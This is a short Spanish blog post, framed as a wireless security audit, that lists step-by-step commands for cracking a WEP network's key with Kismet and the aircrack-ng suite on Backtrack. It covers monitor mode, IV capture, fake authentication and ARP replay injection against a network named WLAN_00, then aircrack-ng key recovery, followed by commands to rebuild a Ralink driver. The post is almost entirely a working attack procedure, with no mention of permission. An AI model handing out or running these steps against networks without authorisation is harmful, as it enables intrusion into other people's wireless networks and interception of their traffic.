Supongamos que quiero auditar la seguridad de un acceso wireless. Vale. Y supongamos que tengo el indispensable Backtrack. Vale. Pues manos a la obra:
1. Abrir consola: $ kismet -c rt2500,ra0,ralink
y la opción L para bloquear en el canal deseado.
2. Para poner en modo monitor: $ airmon-ng start ra0
3. $ airodump-ng --channel (8) --ivs --write /mnt/hda5/casa/ivs/volcado01
4. Otra consola: $ aireplay-ng -1 0 -e (WLAN_00) ra0 (-a BSSID -h mi_BSSID)
5. Otra consola: $ aireplay-ng -3 -e (WLAN_00) ra0 (-b BSSID -h mi_BSSID)
6. Cuando tenga 30.000 ARP,s, unos 380K de archivo: $ aircrack-ng -s volcado*.ivs
Claro que evidentemente mi tarjeta es una Ralink RT-2500. No debe hacer falta pero por si acaso no funciona se puede actualizar su modulo:
$ ifconfig ra0 down
$ rmmod rt2500
$ wget http://rt2x00.serialmonkey.com/rt2500-cvs-daily.tar.gz
$ tar -xvzf rt2500-cvs-daily.tar.gz
$ cd rt2500-cvs-*/Module
$ make && make install
$ modprobe rt2500
No comments:
Post a Comment